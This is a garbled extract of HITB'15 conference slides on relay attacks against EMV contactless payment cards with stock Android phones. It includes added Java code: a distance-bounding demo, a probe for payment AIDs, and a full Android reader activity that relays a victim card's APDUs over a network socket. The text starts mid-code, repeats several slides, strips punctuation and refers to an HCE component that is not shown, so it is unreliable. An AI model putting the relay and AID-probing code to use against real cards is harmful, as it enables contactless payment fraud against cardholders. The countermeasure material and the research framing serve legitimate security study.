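    // The prover holds R0 || R1 after the nonce exchange and answers bit i of R0 or R1
    // depending on the challenge, keeping its own round counter.
    public static final class Prover implements Responder {
        private final byte[] r;
        private int round;
        public Prover(byte[] key, byte[] nv, byte[] np) throws Exception { r = hmac(key, concat(nv, np)); }
        @Override public int respond(int c) { int i = round++; return bit(r, c == 0 ? i : ROUNDS + i); }
    }

    // A passive relay: forwards challenge and answer unchanged, paying an extra delay each way.
    public static Responder relay(final Responder far, final long delayNanos) {
        return c -> { spin(delayNanos); int a = far.respond(c); spin(delayNanos); return a; };
    }

    static void spin(long nanos) { long t = System.nanoTime(); while (System.nanoTime() - t < nanos) { } }

    // The verifier's side: accept only if every bit is right and every round is fast enough.
    public static boolean verify(byte[] key, byte[] nv, byte[] np, Responder p, long boundNanos)
            throws Exception {
        byte[] r = hmac(key, concat(nv, np));
        SecureRandom rnd = new SecureRandom();
        for (int i = 0; i < ROUNDS; i++) {
            int c = rnd.nextInt(2);
            long t0 = System.nanoTime();
            int a = p.respond(c);
            long rtt = System.nanoTime() - t0;
            if (a != bit(r, c == 0 ? i : ROUNDS + i) || rtt > boundNanos) return false;
        }
        return true;
    }

    public static void main(String[] args) throws Exception {
        byte[] key = new byte[16], nv = new byte[8], np = new byte[8];
        SecureRandom rnd = new SecureRandom();
        rnd.nextBytes(key); rnd.nextBytes(nv); rnd.nextBytes(np);
        long bound = 200_000;   // 200 us: generous for an in-process call, tiny for a network hop
        System.out.println("honest prover accepted:  " + verify(key, nv, np, new Prover(key, nv, np), bound));
        System.out.println("relayed prover accepted: " +
                verify(key, nv, np, relay(new Prover(key, nv, np), 2_000_000), bound));
    }
}
```

The point to notice is that the relayed prover answers every bit correctly; it is rejected purely on timing, which is what makes distance bounding effective against a passive relay that the cryptography alone cannot detect. Deploying it on real cards would need the timing enforced by the reader hardware, which, as the slide says, current NFC stacks do not do.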


Related Work: On relay attacks

2005–2009: first works, built on specific hardware.
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app.
2012–2013: relay attacks on Android accessing Secure Elements (an SE securely stores the data associated with credit/debit cards); they need a non-OTS Android device.
2014: active relay attacks with custom hardware and custom Android firmware.
Several works studied the delay introduced by the relay channel: relays over long distances are feasible → latency isn't a hard constraint.
Ask us for specific references: too many names for a single slide.


Conclusions (I)

Security of NFC is based on the physical-proximity assumption.
NFC threats: eavesdropping, data modification, relay attacks.
Android NFC-capable devices are on the rise: they can be abused to interact with cards in their proximity.

Conclusions:
Review of the Android NFC stack.
Proof-of-concept of relay attacks using Android OTS devices.
Threat scenarios introduced.
Virtual pickpocketing attacks may appear before long.


Conclusions (II): But then, what the hell can I do? Should I run away?


Conclusions (III)

Future work:
Develop a botnet infrastructure and earn money
Timing constraints of Android HCE mode
Try active relay attacks on EMV contactless cards

Acknowledgments:
Spanish National Cybersecurity Institute (INCIBE)
University of León under contract X43
HITB staff

And thanks to all of you for listening to us!
Visit http://vwzq.net/relaynfc for more info about the project



Introduction to NFC (I)

What is NFC? A bidirectional short-range contactless communication technology.
Range: up to 10 cm.
Based on RFID standards; works in the 13.56 MHz spectrum.
Data transfer rates vary: 106, 212 and 424 kbps.
Security is based on the proximity assumption, i.e. on physical constraints.


Introduction to NFC (II)

Wow, NFC sounds pretty hipster! Two main elements:
Proximity Coupling Device (PCD, also NFC-capable device)
Proximity Integrated Circuit Card (PICC, also NFC tag)

Three operation modes:
Peer to peer: direct communication between parties
Read/write: communication with an NFC tag
Card emulation: an NFC device behaves as a tag


Introduction to NFC (III)

ISO/IEC 14443 standard: four-part international standard for contactless smartcards
1. Size, physical characteristics, etc.
2. RF power and signalling schemes (Type A & B); half-duplex, 106 kbps base rate
3. Initialization + anticollision protocol
4. Data transmission protocol

IsoDep cards are compliant with the four parts. Example: contactless payment cards.


Introduction to NFC (IV)

ISO/IEC 7816: fifteen-part international standard related to contact integrated circuit cards, especially smartcards.
Application Protocol Data Units (APDUs): the command/response message format defined in part 4, which contactless cards reuse on top of ISO/IEC 14443-4.


Introduction to NFC (V)

[Figure taken from "13.56 MHz RFID Proximity Antennas" (http://www.nxp.com/documents/application_note/AN78010.pdf)]


Introduction to NFC (VI) [image-only slide]


Introduction to NFC (VII)

Ok. So it is secure, right? Right?
If it were so secure you would not be staring at us.

NFC security threats:
Eavesdropping: secure communication as the solution.
Data modification (i.e. alteration, insertion or destruction): feasible in theory, but it requires quite advanced RF knowledge.
Relays: forwarding of the wireless communication. Two types: passive (just forwards) or active (forwards and alters the data).

We focus on passive relay attacks.


Introduction to NFC (VIII)

NFC brings "cards" to mobile devices: the payment sector is quite interested in this new way of making payments.
500M NFC payment users expected by 2019.
Almost 300 smartphones with NFC capabilities available at the moment (check http://www.nfcworld.com/nfc-phones-list); most of them run Android OS.

Research hypothesis: can a passive relay attack be performed on contactless payment cards using an Android NFC-capable device? If so, what are the constraints (if any)?



Background (I): EMV contactless cards

Europay, MasterCard and VISA: standard for the inter-operation of IC cards, Point-of-Sale terminals and automated teller machines, used to authenticate credit and debit card transactions.
Commands follow ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV).
Each payment application on the card is identified by an Application ID (AID) and chosen with the SELECT command.

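How the SELECT-by-AID exchange mentioned here actually looks on the wire, and how a dishonest verifier can find out which AIDs to register before the tap (the "AID known in advance" limitation of the HCE side): an added example, not from the talk, in plain Java that runs on any JDK. An EMV terminal starts by SELECTing the Proximity Payment System Environment (PPSE, DF name "2PAY.SYS.DDF01") and reads the candidate AIDs from the File Control Information the card returns; the verifier can send the same C-APDU through IsoDep.transceive and ship the AIDs to the prover. The APDU layout is the ISO/IEC 7816-4 one from the introduction; the R-APDU below is a constructed sample listing a single MasterCard application.

```java
// Added example, not from the talk: build SELECT PPSE and pull the AIDs out of the FCI.
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

public final class PpseProbe {
    // ISO/IEC 7816-4 case-4 SELECT by DF name: CLA=00 INS=A4 P1=04 (by name) P2=00 Lc data Le.
    public static byte[] selectByName(byte[] name) {
        byte[] apdu = new byte[6 + name.length];
        apdu[0] = 0x00; apdu[1] = (byte) 0xA4; apdu[2] = 0x04; apdu[3] = 0x00;
        apdu[4] = (byte) name.length;
        System.arraycopy(name, 0, apdu, 5, name.length);
        apdu[5 + name.length] = 0x00;   // Le = 00: return up to 256 bytes
        return apdu;
    }

    // Every EMV contactless transaction opens with a SELECT of the PPSE directory.
    public static byte[] selectPpse() {
        return selectByName("2PAY.SYS.DDF01".getBytes(StandardCharsets.US_ASCII));
    }

    // SW1 SW2 are the last two bytes of every R-APDU; 0x9000 means success.
    public static int statusWord(byte[] rapdu) {
        return ((rapdu[rapdu.length - 2] & 0xFF) << 8) | (rapdu[rapdu.length - 1] & 0xFF);
    }

    // Collects every Application Identifier (tag 4F) in the FCI. The PPSE answer nests them
    // as 6F > A5 > BF0C > 61 > 4F, so the BER-TLV walk descends into constructed tags (bit 6
    // of the first tag byte set), handles multi-byte tags such as BF0C and long-form lengths.
    public static List<byte[]> applicationIds(byte[] fci) {
        List<byte[]> aids = new ArrayList<>();
        walk(fci, 0, fci.length, aids);
        return aids;
    }

    private static void walk(byte[] buf, int off, int end, List<byte[]> aids) {
        while (off < end) {
            int tagStart = off;
            boolean constructed = (buf[off] & 0x20) != 0;
            if ((buf[off] & 0x1F) == 0x1F) {          // more tag bytes follow while bit 8 is set
                do { off++; } while (off < end && (buf[off] & 0x80) != 0);
            }
            off++;
            int tagLen = off - tagStart;
            if (off >= end) throw new IllegalArgumentException("truncated TLV header");
            int len = buf[off++] & 0xFF;
            if (len == 0x80) throw new IllegalArgumentException("indefinite length not allowed in EMV");
            if (len > 0x80) {                          // long form: the next (len & 0x7F) bytes hold it
                int n = len & 0x7F;
                if (off + n > end) throw new IllegalArgumentException("truncated TLV length");
                len = 0;
                for (int i = 0; i < n; i++) len = (len << 8) | (buf[off++] & 0xFF);
            }
            if (off + len > end) throw new IllegalArgumentException("TLV value overruns buffer");
            if (tagLen == 1 && buf[tagStart] == 0x4F) {
                byte[] aid = new byte[len];
                System.arraycopy(buf, off, aid, 0, len);
                aids.add(aid);
            } else if (constructed) {
                walk(buf, off, off + len, aids);
            }
            off += len;
        }
    }

    public static String hex(byte[] b) {
        StringBuilder sb = new StringBuilder();
        for (byte x : b) sb.append(String.format("%02X", x));
        return sb.toString();
    }

    static byte[] hexToBytes(String h) {
        byte[] out = new byte[h.length() / 2];
        for (int i = 0; i < out.length; i++)
            out[i] = (byte) Integer.parseInt(h.substring(2 * i, 2 * i + 2), 16);
        return out;
    }

    // Constructed sample R-APDU: FCI with DF name 2PAY.SYS.DDF01, one directory entry (61)
    // carrying AID A0000000041010 (4F) and priority 1 (87), followed by SW 9000.
    static final byte[] SAMPLE_RAPDU = hexToBytes(
        "6F23840E325041592E5359532E4444463031A511BF0C0E610C4F07A0000000041010870101" + "9000");

    public static void main(String[] args) {
        System.out.println("C-APDU SELECT PPSE: " + hex(selectPpse()));
        byte[] r = SAMPLE_RAPDU;
        if (statusWord(r) != 0x9000) throw new IllegalStateException("SELECT PPSE failed");
        byte[] fci = new byte[r.length - 2];                 // strip SW1 SW2
        System.arraycopy(r, 0, fci, 0, fci.length);
        for (byte[] aid : applicationIds(fci)) System.out.println("AID: " + hex(aid));
    }
}
```

On a real card the list may hold several entries (a co-badged card, or a card with both a credit and a debit application), and the terminal picks by priority; a relay has to register every AID the terminal might SELECT, not just the first one. Cards that do not answer the PPSE SELECT with 9000 can still be probed by SELECTing the well-known payment AIDs one by one.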

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36

Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support

Android 42 Jelly Bean (API level 17)

NfcBarcode

IsoPcdB(ISOIEC 14443-4B)

IsoPcdA(ISOIEC 14443-4A)

Android CyanogenMod OS 91

NfcA(ISOIEC 14443-3A)

NfcB(ISOIEC 14443-3B)

NfcV(ISOIEC 15693)

IsoDep(ISOIEC 14443-4)

NfcF(JIS 6319-4)

Ndef

Android 233 Gingerbread (API level 10)

NdefFormatable MifareClassic

MifareUltralight

Android 44 KitKat (API level 19)

thanks to Doug Year

Software

ReaderWriter

Peer-to-peer

Card-emulation

Hardware

Card-emulation

Software

ReaderWriter

Peer-to-peer

Hardware

Card-emulation NfcAdapterReaderCallback

added

NFC

op

erati

on

mod

es

su

pp

orte

d

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci

httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc

httpnfc-forumorgour-workspecifications-and-application-documentsspecifications

nfc-controller-interface-nci-specifications

httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical

20Specificationpdf

httpwwwdatasheet4ucomPDF845670BCM20793Shtml

httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions


Android and NFC: A Tale of Love (VII) – Some remarkable limitations and remarks

Limitation 3: dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
  ISO/IEC 14443-4 defines the Frame Waiting Time (the longest the card may take to answer a frame) as
    FWT = (256 · 16 / fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
  FWT ∈ [≈302 µs, ≈4.95 s] → a relay is theoretically possible as long as the relayed round trip stays below the FWT the card advertises, i.e. at most about 5 s
  ISO/IEC 14443-4 also lets the card ask for a waiting time extension (S(WTX) frame), which stretches the limit further
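The FWT formula worked through, as an added example (not from the slides): it tabulates FWT for every FWI, and checks whether a given relay round trip fits. The 150 ms figure used in main() is an assumed mobile-network round trip, not a measurement from the authors' experiment.

```java
// Frame Waiting Time as defined in ISO/IEC 14443-4 (added example, not from the
// slides). The card announces FWI in its ATS; the reader must wait at least FWT for
// each response, so the whole relay round trip (PoS -> HCE phone -> network ->
// reader phone -> card and back) has to fit inside it.
public final class FrameWaitingTime {
    public static final double FC_HZ = 13.56e6;           // ISO/IEC 14443 carrier fc

    /** FWT = (256 * 16 / fc) * 2^FWI, returned in microseconds; FWI is 0..14. */
    public static double fwtMicros(int fwi) {
        if (fwi < 0 || fwi > 14) {
            throw new IllegalArgumentException("FWI must be 0..14, got " + fwi);
        }
        return (256.0 * 16.0 / FC_HZ) * (1L << fwi) * 1e6;
    }

    /** Whether a measured relay round trip (ms) fits in the FWT for a given FWI. */
    public static boolean relayFits(double relayRoundTripMs, int fwi) {
        return relayRoundTripMs * 1000.0 <= fwtMicros(fwi);
    }

    /** Smallest FWI a card would have to advertise for the relay to fit, or -1. */
    public static int minimumFwi(double relayRoundTripMs) {
        for (int fwi = 0; fwi <= 14; fwi++) {
            if (relayFits(relayRoundTripMs, fwi)) return fwi;
        }
        return -1;
    }

    public static void main(String[] args) {
        for (int fwi = 0; fwi <= 14; fwi++) {
            System.out.printf("FWI=%2d  FWT=%12.1f us%n", fwi, fwtMicros(fwi));
        }
        // FWI=0 -> ~302 us, FWI=14 -> ~4.95 s. A 150 ms relay round trip (an assumed
        // mobile-network figure) needs FWI >= 9 (~155 ms); an FWI of 7 (~38.7 ms)
        // would only leave room for a fast local link.
        System.out.println("150 ms relay fits FWI=7 : " + relayFits(150, 7));
        System.out.println("150 ms relay needs FWI >= " + minimumFwi(150));
    }
}
```

The check is on the round trip the card's FWT has to absorb, not on the one-way network latency: the HCE phone's processing, two radio hops and the return path all count.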

Concluding remarks
  Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
  Any communication involving an APDU-compliant NFC tag (e.g. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice


Relay Attack Implementation (I) – Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support
Android app developed (±2000 LOC)
Two OTS Android NFC-capable devices
One constraint: only the dishonest prover must run Android ≥ 4.4 (it needs HCE); the dishonest verifier only needs reader/writer mode with IsoDep
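The reader half of the relay (the dishonest verifier, next to the victim's card), as an added example rather than the authors' app; the package name, port and wire format are assumptions and match the HCE example above. It uses reader mode so the Android NFC service does not hand the card to another app, and IsoDep.transceive() to forward every C-APDU the HCE phone sends:

```java
// Dishonest-verifier half of the passive relay (added example, not the authors'
// app). Reader mode (API level 19+) keeps the Android NFC service from dispatching
// the card to other apps; on older Android the same IsoDep code can be driven from
// an ACTION_TECH_DISCOVERED intent instead. Needs android.permission.NFC.
package net.example.relay;                                // hypothetical package

import android.app.Activity;
import android.nfc.NfcAdapter;
import android.nfc.Tag;
import android.nfc.tech.IsoDep;
import android.os.Bundle;
import android.util.Log;

import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.net.ServerSocket;
import java.net.Socket;

public class RelayReaderActivity extends Activity implements NfcAdapter.ReaderCallback {
    private static final String TAG = "RelayReader";
    private static final int LISTEN_PORT = 9000;          // assumed; must match the HCE side

    private NfcAdapter adapter;
    private volatile Socket peer;                          // the HCE phone, once connected

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        adapter = NfcAdapter.getDefaultAdapter(this);
        // Accept the HCE phone's connection before any card is presented: the
        // card's Frame Waiting Time starts with the first APDU, not before.
        new Thread(() -> {
            try (ServerSocket server = new ServerSocket(LISTEN_PORT)) {
                Socket s = server.accept();
                s.setTcpNoDelay(true);
                peer = s;
            } catch (IOException e) {
                Log.e(TAG, "listen failed", e);
            }
        }).start();
    }

    @Override
    protected void onResume() {
        super.onResume();
        // NFC-A and NFC-B cover both ISO/IEC 14443 types used by EMV cards;
        // SKIP_NDEF_CHECK avoids a pointless NDEF probe before onTagDiscovered().
        adapter.enableReaderMode(this, this,
                NfcAdapter.FLAG_READER_NFC_A | NfcAdapter.FLAG_READER_NFC_B
                        | NfcAdapter.FLAG_READER_SKIP_NDEF_CHECK, null);
    }

    @Override
    protected void onPause() {
        super.onPause();
        adapter.disableReaderMode(this);
    }

    // Runs on a binder thread, not the UI thread, so blocking I/O is fine here.
    @Override
    public void onTagDiscovered(Tag tag) {
        IsoDep card = IsoDep.get(tag);
        if (card == null) {
            // e.g. MIFARE Classic: not ISO/IEC 14443-4, cannot be relayed at APDU level
            Log.w(TAG, "tag is not IsoDep, ignoring");
            return;
        }
        Socket p = peer;
        if (p == null) {
            Log.w(TAG, "HCE phone not connected yet");
            return;
        }
        try {
            card.connect();
            // transceive() gives up after this many ms; keep it above the card's own
            // FWT (at most about 5 s) so slow EMV responses are not cut off here.
            card.setTimeout(5000);
            DataInputStream in = new DataInputStream(p.getInputStream());
            DataOutputStream out = new DataOutputStream(p.getOutputStream());
            // Same wire format as the HCE side: 2-byte length prefix, then the APDU.
            while (card.isConnected()) {
                byte[] capdu = new byte[in.readUnsignedShort()];
                in.readFully(capdu);
                byte[] rapdu = card.transceive(capdu);    // NFCC adds 14443-4 framing and CRC
                out.writeShort(rapdu.length);
                out.write(rapdu);
                out.flush();
            }
        } catch (IOException e) {                          // includes TagLostException
            Log.e(TAG, "card or relay channel lost", e);
        } finally {
            try { card.close(); } catch (IOException ignored) { }
        }
    }
}
```

Nothing in this loop inspects or alters the APDUs, which is what makes the relay passive: the terminal and the card run their normal EMV dialogue, only over a longer path.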


Relay Attack Implementation (II) – Threat Scenarios: Scenario 1

Distributed Mafia Fraud

[Figure: a botmaster controlling several bots]


Relay Attack Implementation (III) – Threat Scenarios: Scenario 2

Hiding Fraud Locations


Relay Attack Implementation (IV) – Resistant Mechanisms

Brief summary of resistant mechanisms
  Distance-bounding protocols
    Upper-bound the physical distance using the round-trip time of cryptographic challenge-response messages
  Timing constraints
    Not enforced in current NFC-capable systems
    The protocol itself allows timing extension commands (waiting time extensions), so a tight FWT cannot be relied on
  Physical countermeasures
    Whitelisting/blacklisting: random UID in HCE mode → unfeasible
    RFID blocking covers
    Physical button/switch activation
    Secondary authentication methods (e.g. on-card fingerprint scanners)
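How a distance-bounding check differs from the FWT-scale timing above, as an added example (a simplified Hancke-Kuhn style rapid bit exchange written for this page, not a mechanism from the slides or from any EMV specification). The verifier sends single-bit challenges whose answers depend on a shared key, so a relay cannot precompute them, and turns each round trip into a distance bound; the RTT traces and the 100 ns prover latency are constructed values:

```java
// Distance-bounding verifier (added example; simplified Hancke-Kuhn style protocol).
// The key point: a relay adds milliseconds, and one millisecond of extra round trip
// already "proves" a distance of ~150 km, so even coarse timing catches it, while
// FWT (tens of ms to seconds) never can.
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.security.SecureRandom;
import java.util.Arrays;

public final class DistanceBounding {
    static final double C_M_PER_NS = 0.299792458;          // speed of light, metres per ns
    static final int ROUNDS = 64;

    /** Both sides derive two 64-bit response registers R0, R1 from key and nonce. */
    static byte[][] registers(byte[] key, byte[] nonce) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        byte[] h = mac.doFinal(nonce);                      // 32 bytes
        return new byte[][]{Arrays.copyOfRange(h, 0, 8), Arrays.copyOfRange(h, 8, 16)};
    }

    static int bit(byte[] reg, int i) {
        return (reg[i / 8] >> (7 - i % 8)) & 1;
    }

    /** Prover side: answers challenge bit c of round i with R_c[i]. */
    interface Prover { int answer(int round, int challenge); }

    static Prover honestProver(byte[] key, byte[] nonce) throws Exception {
        byte[][] r = registers(key, nonce);
        return (i, c) -> bit(r[c], i);
    }

    /**
     * Verifier: checks every answer bit and converts the worst round trip into a
     * distance upper bound in metres. Returns -1 if any answer bit was wrong.
     * rttNs[i] is the measured round trip of round i; procNs the prover's answer latency.
     */
    static double verify(Prover prover, byte[] key, byte[] nonce, long[] rttNs, long procNs)
            throws Exception {
        byte[][] r = registers(key, nonce);
        SecureRandom rnd = new SecureRandom();
        double worst = 0;
        for (int i = 0; i < ROUNDS; i++) {
            int c = rnd.nextInt(2);
            if (prover.answer(i, c) != bit(r[c], i)) return -1;   // no key: caught by content
            // one-way propagation time = (RTT - processing) / 2
            worst = Math.max(worst, (rttNs[i] - procNs) / 2.0 * C_M_PER_NS);
        }
        return worst;
    }

    public static void main(String[] args) throws Exception {
        byte[] key = "shared-secret-card-terminal".getBytes("UTF-8");   // constructed
        byte[] nonce = new byte[16];
        new SecureRandom().nextBytes(nonce);
        long procNs = 100;                                   // assumed prover latency

        // Constructed RTT traces: a card a few cm away, and the same card behind a
        // relay that adds 2 ms per round (a very fast relay by mobile-network standards).
        long[] direct = new long[ROUNDS];
        Arrays.fill(direct, procNs + 1);
        long[] relayed = new long[ROUNDS];
        Arrays.fill(relayed, procNs + 2_000_000L);

        Prover card = honestProver(key, nonce);
        System.out.printf("direct : bound = %.2f m%n", verify(card, key, nonce, direct, procNs));
        System.out.printf("relayed: bound = %.0f m%n", verify(card, key, nonce, relayed, procNs));
        // A relay that does not know the key fails on content, not only on timing.
        Prover guesser = (i, c) -> 0;
        System.out.println("guesser: bound = " + verify(guesser, key, nonce, direct, procNs));
    }
}
```

Real distance bounding needs hardware timing at nanosecond resolution to bound honest cards to centimetres, which is why it is absent from current NFC stacks; the example only shows that the protocol's verdict is driven by the round trip, whereas the ISO/IEC 14443-4 FWT and its extension frames leave relays all the time they need.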


Related Work – On relay attacks

2005-2009: first works, built on specific hardware
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
2012-2013: relay attacks on Android accessing Secure Elements
  A SE securely stores data associated with credit/debit cards
  Needs a non-OTS Android device
2014: active relay attacks with custom hardware and custom Android firmware
Several works studied the delay introduced by the relay channel
  Relays over long distances are feasible → latency is not a hard constraint
Ask us for specific references: too many names for a single slide


Conclusions (I)

Security of NFC is based on the physical proximity concern
NFC threats: eavesdropping, data modification, relay attacks
Android NFC-capable devices are rising
  Abuse: interact with cards in their proximity

Conclusions
  Review of the Android NFC stack
  Proof-of-Concept of relay attacks using Android OTS devices
  Threat scenarios introduced
  Virtual pickpocketing attacks may appear before long


Conclusions (II) – But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work
  Develop a botnet infrastructure and earn money
  Timing constraints of Android HCE mode
  Try active relay attacks within EMV contactless cards

Acknowledgments
  Spanish National Cybersecurity Institute (INCIBE)
  University of León under contract X43
  HITB staff

And thanks to all for hearing us!

Visit http://vwzq.net/relaynfc for more info about the project


Introduction to NFC (I)

What is NFCBidirectional short-range contactless communication technology

Up to 10 cm

Based on RFID standards works in the 1356 MHz spectrum

Data transfer rates vary 106 216 and 424 kbps

Security based on proximity concern physical constraints

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36

Introduction to NFC (II)

Wow NFC sounds pretty hipsterTwo main elements

Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)

Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 6 36

Introduction to NFC (III)

ISOIEC 14443 standardFour-part international standard forcontactless smartcards

1 Size physical characteristics etc2 RF power and signalling schemes

(Type A amp B)Half-duplex 106 kbps rate

3 Initialization + anticollision protocol4 Data transmission protocol

IsoDep cards compliant with the fourparts

Example contactless payment cards

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36

Introduction to NFC (IV)

ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards

Application Protocol Data Units (APDUs)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36

Introduction to NFC (V)

